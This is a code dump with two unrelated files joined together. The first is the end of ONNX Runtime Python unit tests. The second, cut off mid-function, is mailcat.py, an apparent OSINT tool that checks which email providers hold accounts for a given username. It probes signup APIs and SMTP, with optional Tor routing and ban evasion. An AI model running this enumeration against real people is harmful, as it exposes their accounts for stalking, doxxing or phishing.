opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=opt)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": []
})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"))
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(session_options.execution_mode,
onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config)
self.assertEqual(session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalide_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalide_key)
self.assertTrue(
'SessionOptions does not have configuration with key: ' + invalide_key in str(context.exception))
def testSessionOptionsAddInitializer(self):
# Create an initializer and add it to a SessionOptions instance
so = onnxrt.SessionOptions()
# This initializer is different from the actual initializer in the model for "W"
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32))
# The user should manage the life cycle of this OrtValue and should keep it in scope
# as long as any session that is going to be reliant on it is in scope
so.add_initializer("W", ortvalue_initializer)
# Create an InferenceSession that only uses the CPU EP and validate that it uses the
# initializer provided via the SessionOptions instance (overriding the model initializer)
# We only use the CPU EP because the initializer we created is on CPU and we want the model to use that
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), so, ['CPUExecutionProvider'])
res = sess.run(["Y"], {"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)})
self.assertTrue(np.array_equal(res[0], np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32)))
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = 'custom_op_library.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = 'libcustom_op_library.dylib'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = './libcustom_op_library.so'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, so1)
#Run with input data
input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3,5)).astype(np.float32)
input_1 = np.zeros((3,5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3,5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, so2)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, so3)
def testOrtValue(self):
numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
def test_session_with_ortvalue_input(ortvalue):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
res = sess.run(["Y"], {"X": ortvalue})
self.assertTrue(np.array_equal(res[0], numpy_arr_output))
ortvalue1 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input)
self.assertEqual(ortvalue1.device_name(), "cpu")
self.assertEqual(ortvalue1.shape(), [3, 2])
self.assertEqual(ortvalue1.data_type(), "tensor(float)")
self.assertEqual(ortvalue1.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue1)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
ortvalue2 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, 'cuda', 0)
self.assertEqual(ortvalue2.device_name(), "cuda")
self.assertEqual(ortvalue2.shape(), [3, 2])
self.assertEqual(ortvalue2.data_type(), "tensor(float)")
self.assertEqual(ortvalue2.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue2)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
def testRunModelWithCudaCopyStream(self):
available_providers = onnxrt.get_available_providers()
if (not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
else:
# adapted from issue #4829 for a race condition when copy is not on default stream
# note:
# 1. if there are intermittent failure in this test, something is wrong
# 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
# to repro #4829, set the CUDA EP do_copy_in_default_stream option to False
providers = [("CUDAExecutionProvider", {"do_copy_in_default_stream": True}), "CPUExecutionProvider"]
session = onnxrt.InferenceSession(get_name("issue4829.onnx"), providers=providers)
shape = np.array([2,2], dtype=np.int64)
for iteration in range(100000):
result = session.run(output_names=['output'], input_feed={'shape': shape})
def testSharedAllocatorUsingCreateAndRegisterAllocator(self):
# Create and register an arena based allocator
# ort_arena_cfg = onnxrt.OrtArenaCfg(0, -1, -1, -1) (create an OrtArenaCfg like this template if you want to use non-default parameters)
ort_memory_info = onnxrt.OrtMemoryInfo("Cpu", onnxrt.OrtAllocatorType.ORT_ARENA_ALLOCATOR, 0, onnxrt.OrtMemType.DEFAULT)
# Use this option if using non-default OrtArenaCfg : onnxrt.create_and_register_allocator(ort_memory_info, ort_arena_cfg)
onnxrt.create_and_register_allocator(ort_memory_info, None)
# Create a session that will use the registered arena based allocator
so1 = onnxrt.SessionOptions()
so1.log_severity_level = 1
so1.add_session_config_entry("session.use_env_allocators", "1");
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so1)
# Create a session that will NOT use the registered arena based allocator
so2 = onnxrt.SessionOptions()
so2.log_severity_level = 1
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so2)
def testCheckAndNormalizeProviderArgs(self):
from onnxruntime.capi.onnxruntime_inference_collection import check_and_normalize_provider_args
valid_providers = ["a", "b", "c"]
def check_success(providers, provider_options, expected_providers, expected_provider_options):
actual_providers, actual_provider_options = check_and_normalize_provider_args(
providers, provider_options, valid_providers)
self.assertEqual(actual_providers, expected_providers)
self.assertEqual(actual_provider_options, expected_provider_options)
check_success(None, None, [], [])
check_success(["a"], None, ["a"], [{}])
check_success(["a", "b"], None, ["a", "b"], [{}, {}])
check_success([("a", {1: 2}), "b"], None, ["a", "b"], [{"1": "2"}, {}])
check_success(["a", "b"], [{1: 2}, {}], ["a", "b"], [{"1": "2"}, {}])
with self.assertWarns(UserWarning):
check_success(["a", "b", "a"], [{"x": 1}, {}, {"y": 2}], ["a", "b"], [{"x": "1"}, {}])
def check_failure(providers, provider_options):
with self.assertRaises(ValueError):
check_and_normalize_provider_args(providers, provider_options, valid_providers)
# disable this test
# provider not valid
#check_failure(["d"], None)
# providers not sequence
check_failure(3, None)
# providers value invalid
check_failure([3], None)
# provider_options not sequence
check_failure(["a"], 3)
# provider_options value invalid
check_failure(["a"], ["not dict"])
# providers and provider_options length mismatch
check_failure(["a", "b"], [{1: 2}])
# provider options unsupported mixed specification
check_failure([("a", {1: 2})], [{3: 4}])
def testRegisterCustomEPsLibrary(self):
# exclude for macos and linux
if not sys.platform.startswith("win"):
return
# Exclude for training
training_enabled = False
try:
from onnxruntime.capi.ort_trainer import ORTTrainer
training_enabled = True
except:
pass
if training_enabled:
return
shared_library = 'test_execution_provider.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_execution_provider_library", "test_model.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
from onnxruntime.capi import _pybind_state as C
session_options = C.get_default_session_options()
sess = C.InferenceSession(session_options, custom_op_model, True, True)
sess.initialize_session(['my_ep'],
[{'shared_lib_path': shared_library,
'device_id':'1', 'some_config':'val'}],
set())
print("Create session with customize execution provider successfully!")
if __name__ == '__main__':
unittest.main()
|
mailcat.py
|
#!/usr/bin/python3
import argparse
import base64
import datetime
import json
import random
import smtplib
import string as s
import sys
import threading
from time import sleep
from typing import Dict, List
import dns.resolver
import requests
from requests_html import HTMLSession # type: ignore
def randstr(num):
return ''.join(random.sample((s.ascii_lowercase + s.ascii_uppercase + s.digits), num))
def sleeper(sList, s_min, s_max):
for ind in sList:
if sList.index(ind) < (len(sList) - 1):
# print("less", sList.index(ind))
sleep(random.uniform(s_min, s_max))
def via_tor():
session = requests.Session()
session.proxies = {'http': 'socks5://127.0.0.1:9050',
'https': 'socks5://127.0.0.1:9050'}
return session
def simple_session():
return requests.Session()
def code250(mailProvider, target):
target = target
providerLst = []
randPref = ''.join(random.sample(s.ascii_lowercase, 6))
fromAddress = "{}@{}".format(randPref, mailProvider)
targetMail = "{}@{}".format(target, mailProvider)
records = dns.resolver.Resolver().resolve(mailProvider, 'MX')
mxRecord = records[0].exchange
mxRecord = str(mxRecord)
try:
server = smtplib.SMTP()
server.set_debuglevel(0)
server.connect(mxRecord)
server.helo(server.local_hostname)
server.mail(fromAddress)
code, message = server.rcpt(targetMail)
if code == 250:
providerLst.append(targetMail)
return providerLst
except Exception as e:
pass
return []
def gmail(target, req_session_fun) -> Dict:
result = {}
gmailChkLst = code250("gmail.com", target)
if gmailChkLst:
result["Google"] = gmailChkLst[0]
return result
def yandex(target, req_session_fun) -> Dict:
result = {}
yaAliasesLst = ["yandex.by",
"yandex.kz",
"yandex.ua",
"yandex.com",
"ya.ru"]
yaChkLst = code250("yandex.ru", target)
if yaChkLst:
yaAliasesLst = ['{}@{}'.format(target, yaAlias) for yaAlias in yaAliasesLst]
yaMails = list(set(yaChkLst + yaAliasesLst))
result["Yandex"] = yaMails
return result
def proton(target, req_session_fun) -> Dict:
result = {}
'''
protonMails = []
protonDomainsLst = ["protonmail.com",
"protonmail.ch",
"pm.me"]
for ProtonDomain in protonDomainsLst:
protonChk = code250(ProtonDomain, target)
if protonChk and protonChk is not None:
protonMails += protonChk
sleep(random.uniform(2, 4))
if protonMails:
print('\n'.join(["[+] Success with {}".format(protonMail) for protonMail in protonMails]))
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36'}
protonLst = ["protonmail.com", "protonmail.ch", "pm.me"]
protonSucc = []
sreq = req_session_fun()
for proton_domain in protonLst:
proton_mail = "{}@{}".format(target, proton_domain)
# check_prot_mail = requests.get("https://api.protonmail.ch/pks/lookup?op=get&search={}".format(proton_mail), headers=headers)
check_prot_mail = sreq.get("https://api.protonmail.ch/pks/lookup?op=get&search={}".format(proton_mail),
headers=headers, timeout=5)
if check_prot_mail.text != "No key found":
protonSucc.append(proton_mail)'''
protonLst = ["protonmail.com", "protonmail.ch", "pm.me"]
protonSucc = []
sreq = req_session_fun()
protonURL = "https://mail.protonmail.com/api/users/available?Name={}".format(target)
headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Accept": "application/vnd.protonmail.v1+json",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Referer": "https://mail.protonmail.com/create/new?language=en",
"x-pm-appversion": "Web_3.16.19",
"x-pm-apiversion": "3",
"Cache-Control": "no-cache",
"Pragma": "no-cache",
"DNT": "1", "Connection": "close"}
try:
chkProton = sreq.get(protonURL, headers=headers, timeout=3)
if chkProton.status_code == 409:
chkProton = chkProton.json()
exists = chkProton['Error']
if exists == "Username already used":
protonSucc = ["{}@{}".format(target, protodomain) for protodomain in protonLst]
except Exception as e:
#print(e)
pass
if protonSucc:
result["Proton"] = protonSucc
return result
def mailRu(target, req_session_fun) -> Dict:
result = {}
# headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0', 'Referer': 'https://account.mail.ru/signup?from=main&rf=auth.mail.ru'}
mailRU = ["mail.ru", "bk.ru", "inbox.ru", "list.ru", "internet.ru"]
mailRuSucc = []
sreq = req_session_fun()
for maildomain in mailRU:
try:
headers = {'User-Agent': random.choice(uaLst)}
mailruMail = "{}@{}".format(target, maildomain)
data = {'email': mailruMail}
# chkMailRU = requests.post('https://account.mail.ru/api/v1/user/exists', headers=headers, data=data)
chkMailRU = sreq.post('https://account.mail.ru/api/v1/user/exists', headers=headers, data=data, timeout=5)
if chkMailRU.status_code == 200:
exists = chkMailRU.json()['body']['exists']
if exists:
mailRuSucc.append(mailruMail)
except Exception as e:
pass
sleep(random.uniform(0.5, 2))
if mailRuSucc:
result["MailRU"] = mailRuSucc
return result
def rambler(target, req_session_fun) -> Dict: # basn risk
result = {}
ramblerMail = ["rambler.ru", "lenta.ru", "autorambler.ru", "myrambler.ru", "ro.ru", "rambler.ua"]
ramblerSucc = []
sreq = req_session_fun()
for maildomain in ramblerMail:
try:
targetMail = "{}@{}".format(target, maildomain)
# reqID = ''.join(random.sample((s.ascii_lowercase + s.ascii_uppercase + s.digits), 20))
reqID = randstr(20)
userAgent = random.choice(uaLst)
ramblerChkURL = "https://id.rambler.ru:443/jsonrpc"
# "Referer": "https://id.rambler.ru/login-20/mail-registration?back=https%3A%2F%2Fmail.rambler.ru%2F&rname=mail¶m=embed&iframeOrigin=https%3A%2F%2Fmail.rambler.ru",
headers = {"User-Agent": userAgent,
"Referer": "https://id.rambler.ru/login-20/mail-registration?utm_source=head"
"&utm_campaign=self_promo&utm_medium=header&utm_content=mail&rname=mail"
"&back=https%3A%2F%2Fmail.rambler.ru%2F%3Futm_source%3Dhead%26utm_campaign%3Dself_promo%26utm_medium%3Dheader%26utm_content%3Dmail"
"¶m=embed&iframeOrigin=https%3A%2F%2Fmail.rambler.ru&theme=mail-web",
"Content-Type": "application/json",
"Origin": "https://id.rambler.ru",
"X-Client-Request-Id": reqID}
ramblerJSON = {"method": "Rambler::Id::login_available", "params": [{"login": targetMail}], "rpc": "2.0"}
# ramblerChk = requests.post(ramblerChkURL, headers=headers, json=ramblerJSON)
ramblerChk = sreq.post(ramblerChkURL, headers=headers, json=ramblerJSON, timeout=5)
if ramblerChk.status_code == 200:
try:
exist = ramblerChk.json()['result']['profile']['status']
if exist == "exist":
ramblerSucc.append(targetMail)
# print("[+] Success with {}".format(targetMail))
# else:
# print("[-]".format(ramblerChk.text))
except KeyError as e:
pass
# print(e)
sleep(random.uniform(4, 6)) # don't reduce
except Exception as e:
pass
if ramblerSucc:
result["Rambler"] = ramblerSucc
return result
def tuta(target, req_session_fun) -> Dict:
result = {}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}
tutaMail = ["tutanota.com", "tutanota.de", "tutamail.com", "tuta.io", "keemail.me"]
tutaSucc = []
sreq = req_session_fun()
for maildomain in tutaMail:
try:
targetMail = "{}@{}".format(target, maildomain)
tutaURL = "https://mail.tutanota.com/rest/sys/mailaddressavailabilityservice?_body="
tutaCheck = sreq.get(
'{}%7B%22_format%22%3A%220%22%2C%22mailAddress%22%3A%22{}%40{}%22%7D'.format(tutaURL, target,
maildomain),
headers=headers, timeout=5)
if tutaCheck.status_code == 200:
exists = tutaCheck.json()['available']
if exists == "0":
tutaSucc.append(targetMail)
sleep(random.uniform(2, 4))
except Exception as e:
pass
if tutaSucc:
result["Tutanota"] = tutaSucc
return result
def yahoo(target, req_session_fun) -> Dict:
result = {}
yahooURL = "https://login.yahoo.com:443/account/module/create?validateField=yid"
yahooCookies = {"B": "10kh9jteu3edn&b=3&s=66", "AS": "v=1&s=wy5fFM96"} # 13 8
# yahooCookies = {"B": "{}&b=3&s=66".format(randstr(13)), "AS": "v=1&s={}".format(randstr(8))} # 13 8
headers = {"User-Agent": random.choice(uaLst),
"Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
"Referer": "https://login.yahoo.com/account/create?.src=ym&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd&authMechanism=primary&specId=yidReg",
"content-type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest",
"DNT": "1", "Connection": "close"}
# yahooPOST = {"specId": "yidReg", "crumb": randstr(11), "acrumb": randstr(8), "yid": target} # crumb: 11, acrumb: 8
yahooPOST = {"specId": "yidReg", "crumb": "bshN8x9qmfJ", "acrumb": "wy5fFM96", "yid": target}
sreq = req_session_fun()
try:
yahooChk = sreq.post(yahooURL, headers=headers, cookies=yahooCookies, data=yahooPOST, timeout=5)
if '"IDENTIFIER_EXISTS"' in yahooChk.text:
result["Yahoo"] = "{}@yahoo.com".format(target)
except Exception as e:
pass
return result
def outlook(target, req_session_fun) -> Dict:
result = {}
liveSucc = []
_sreq = HTMLSession()
headers = {"User-Agent": random.choice(uaLst)}
liveLst = ["outlook.com", "hotmail.com"]
url_template = 'https://signup.live.com/?username={}@{}&uaid=f746d3527c20414d8c86fd7f96613d85&lic=1'
for maildomain in liveLst:
try:
liveChk = _sreq.get(url_template.format(target, maildomain), headers=headers)
liveChk.html.render(sleep=10)
if "suggLink" in liveChk.html.html:
liveSucc.append("{}@{}".format(target, maildomain))
except Exception as e:
pass
if liveSucc:
result["Live"] = liveSucc
return result
def zoho(target, req_session_fun) -> Dict:
result = {}
headers = {
"User-Agent": "User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36",
"Referer": "https://www.zoho.com/",
"Origin": "https://www.zoho.com"
}
zohoURL = "https://accounts.zoho.com:443/accounts/validate/register.ac"
zohoPOST = {"username": target, "servicename": "VirtualOffice", "serviceurl": "/"}
sreq = req_session_fun()
try:
zohoChk = sreq.post(zohoURL, headers=headers, data=zohoPOST, timeout=10)
if zohoChk.status_code == 200:
# if "IAM.ERROR.USERNAME.NOT.AVAILABLE" in zohoChk.text:
# print("[+] Success with {}@zohomail.com".format(target))
if zohoChk.json()['error']['username'] == 'This username is taken':
result["Zoho"] = "{}@zohomail.com".format(target)
# print("[+] Success with {}@zohomail.com".format(target))
except Exception as e:
pass
return result
def lycos(target, req_session_fun) -> Dict:
result = {}
lycosURL = "https://registration.lycos.com/usernameassistant.php?validate=1&m_AID=0&t=1625674151843&m_U={}&m_PR=27&m_SESSIONKEY=4kCL5VaODOZ5M5lBF2lgVONl7tveoX8RKmedGRU3XjV3xRX5MqCP2NWHKynX4YL4".format(
target)
headers = {
"User-Agent": "User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36",
"Referer": "https://registration.lycos.com/register.php?m_PR=27&m_E=7za1N6E_h_nNSmIgtfuaBdmGpbS66MYX7lMDD-k9qlZCyq53gFjU_N12yVxL01F0R_mmNdhfpwSN6Kq6bNfiqQAA",
"X-Requested-With": "XMLHttpRequest"}
sreq = req_session_fun()
try:
# lycosChk = requests.get(lycosURL, headers=headers)
lycosChk = sreq.get(lycosURL, headers=headers, timeout=10)
if lycosChk.status_code == 200:
if lycosChk.text == "Unavailable":
result["Lycos"] = "{}@lycos.com".format(target)
except Exception as e:
pass
return result
def eclipso(target, req_session_fun) -> Dict: # high ban risk + false positives after
result = {}
eclipsoSucc = []
eclipsoLst = ["eclipso.eu",
"eclipso.de",
"eclipso.at",
"eclipso.ch",
"eclipso.be",
"eclipso.es",
"eclipso.it",
"eclipso.me",
"eclipso.nl",
"eclipso.email"]
headers = {'User-Agent': random.choice(uaLst),
'Referer': 'https://www.eclipso.eu/signup/tariff-5',
'X-Requested-With': 'XMLHttpRequest'}
sreq = req_session_fun()
for maildomain in eclipsoLst:
try:
targetMail = "{}@{}".format(target, maildomain)
eclipsoURL = "https://www.eclipso.eu/index.php?action=checkAddressAvailability&address={}".format(
targetMail)
chkEclipso = sreq.get(eclipsoURL, headers=headers, timeout=5)
if chkEclipso.status_code == 200:
if '>0<' in chkEclipso.text:
eclipsoSucc.append(targetMail)
except Exception as e:
pass
sleep(random.uniform(2, 4))
if eclipsoSucc:
result["Eclipso"] = eclipsoSucc
return result
def posteo(target, req_session_fun) -> Dict:
result = {}
posteoLst = [
"posteo.af",
"posteo.at",
"posteo.be",
"posteo.ca",
"posteo.ch",
"posteo.cl",
"posteo.co",
"posteo.co.uk",
"posteo.com.br",
"posteo.cr",
"posteo.cz",
"posteo.de",
"posteo.dk",
"posteo.ee",
"posteo.es",
"posteo.eu",
"posteo.fi",
"posteo.gl",
"posteo.gr",
"posteo.hn",
"posteo.hr",
"posteo.hu",
"posteo.ie",
"posteo.in",
"posteo.is",
"posteo.it",
"posteo.jp",
"posteo.la",
"posteo.li",
"posteo.lt",
"posteo.lu",
"posteo.me",
"posteo.mx",
"posteo.my",
"posteo.net",
"posteo.nl",
"posteo.no",
"posteo.nz",
"posteo.org",
"posteo.pe",
"posteo.pl",
"posteo.pm",
"posteo.pt",
"posteo.ro",
"posteo.ru",
"posteo.se",
"posteo.sg",
"posteo.si",
"posteo.tn",
"posteo.uk",
"posteo.us"]
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
'Referer': 'https://posteo.de/en/signup',
'X-Requested-With': 'XMLHttpRequest'}
sreq = req_session_fun()
try:
eclipsoURL = "https://posteo.de/users/new/check_username?user%5Busername%5D={}".format(target)
chkEclipso = sreq.get(eclipsoURL, headers=headers, timeout=5)
if chkEclipso.status_code == 200:
if chkEclipso.text == "false":
result["Posteo"] = ["{}@posteo.net".format(target),
"~50 aliases: https://posteo.de/en/help/which-domains-are-available-to-use-as-a-posteo-alias-address"]
except Exception as e:
pass
return result
def mailbox(target, req_session_fun) -> Dict: # tor RU
result = {}
mailboxURL = "https://register.mailbox.org:443/ajax"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"}
mailboxJSON = {"account_name": target, "action": "validateAccountName"}
existiert = "Der Accountname existiert bereits."
sreq = req_session_fun()
try:
chkMailbox = sreq.post(mailboxURL, headers=headers, json=mailboxJSON, timeout=10)
if chkMailbox.text == existiert:
result["MailBox"] = "{}@mailbox.org".format(target)
# print("[+] Success with {}@mailbox.org".format(target))
except Exception as e:
# print(e)
pass
return result
def firemail(target, req_session_fun) -> Dict: # tor RU
result = {}
firemailSucc = []
firemailDomains = ["firemail.at", "firemail.de", "firemail.eu"]
headers = {'User-Agent': random.choice(uaLst),
'Referer': 'https://firemail.de/E-Mail-Adresse-anmelden',
'X-Requested-With': 'XMLHttpRequest'}
sreq = req_session_fun()
for firemailDomain in firemailDomains:
try:
targetMail = "{}@{}".format(target, firemailDomain)
firemailURL = "https://firemail.de/index.php?action=checkAddressAvailability&address={}".format(targetMail)
chkFiremail = sreq.get(firemailURL, headers=headers, timeout=10)
if chkFiremail.status_code == 200:
if '>0<' in chkFiremail.text:
firemailSucc.append("{}".format(targetMail))
except Exception as e:
pass
sleep(random.uniform(2, 4))
if firemailSucc:
result["Firemail"] = firemailSucc
return result
def fastmail(target, req_session_fun) -> Dict: # sanctions against Russia) TOR + 4 min for check in loop(
result = {}
fastmailSucc = []
fastmailLst = [
"fastmail.com", "fastmail.cn", "fastmail.co.uk", "fastmail.com.au",
"fastmail.de", "fastmail.es", "fastmail.fm", "fastmail.fr",
"fastmail.im", "fastmail.in", "fastmail.jp", "fastmail.mx",
"fastmail.net", "fastmail.nl", "fastmail.org", "fastmail.se",
"fastmail.to", "fastmail.tw", "fastmail.uk", "fastmail.us",
"123mail.org", "airpost.net", "eml.cc", "fmail.co.uk",
"fmgirl.com", "fmguy.com", "mailbolt.com", "mailcan.com",
"mailhaven.com", "mailmight.com", "ml1.net", "mm.st",
"myfastmail.com", "proinbox.com", "promessage.com", "rushpost.com",
"sent.as", "sent.at", "sent.com", "speedymail.org",
"warpmail.net", "xsmail.com", "150mail.com", "150ml.com",
"16mail.com", "2-mail.com", "4email.net", "50mail.com",
"allmail.net", "bestmail.us", "cluemail.com", "elitemail.org",
"emailcorner.net", "emailengine.net", "emailengine.org", "emailgroups.net",
"emailplus.org", "emailuser.net", "f-m.fm", "fast-email.com",
"fast-mail.org", "fastem.com", "fastemail.us", "fastemailer.com",
"fastest.cc", "fastimap.com", "fastmailbox.net", "fastmessaging.com",
"fea.st", "fmailbox.com", "ftml.net", "h-mail.us",
"hailmail.net", "imap-mail.com", "imap.cc", "imapmail.org",
"inoutbox.com", "internet-e-mail.com", "internet-mail.org",
"internetemails.net", "internetmailing.net", "jetemail.net",
"justemail.net", "letterboxes.org", "mail-central.com", "mail-page.com",
"mailandftp.com", "mailas.com", "mailc.net", "mailforce.net",
"mailftp.com", "mailingaddress.org", "mailite.com", "mailnew.com",
"mailsent.net", "mailservice.ms", "mailup.net", "mailworks.org",
"mymacmail.com", "nospammail.net", "ownmail.net", "petml.com",
"postinbox.com", "postpro.net", "realemail.net", "reallyfast.biz",
"reallyfast.info", "speedpost.net", "ssl-mail.com", "swift-mail.com",
"the-fastest.net", "the-quickest.com", "theinternetemail.com",
"veryfast.biz", "veryspeedy.net", "yepmail.net", "your-mail.com"]
headers = {"User-Agent": random.choice(uaLst),
"Referer": "https://www.fastmail.com/signup/",
"Content-type": "application/json",
"X-TrustedClient": "Yes",
"Origin": "https://www.fastmail.com"}
fastmailURL = "https://www.fastmail.com:443/jmap/setup/"
sreq = req_session_fun()
for fmdomain in fastmailLst:
# print(fastmailLst.index(fmdomain)+1, fmdomain)
fmmail = "{}@{}".format(target, fmdomain)
fastmailJSON = {"methodCalls": [["Signup/getEmailAvailability", {"email": fmmail}, "0"]],
"using": ["https://www.fastmail.com/dev/signup"]}
try:
chkFastmail = sreq.post(fastmailURL, headers=headers, json=fastmailJSON, timeout=5)
if chkFastmail.status_code == 200:
try:
fmJson = chkFastmail.json()['methodResponses'][0][1]['isAvailable']
if fmJson is False:
fastmailSucc.append("{}".format(fmmail))
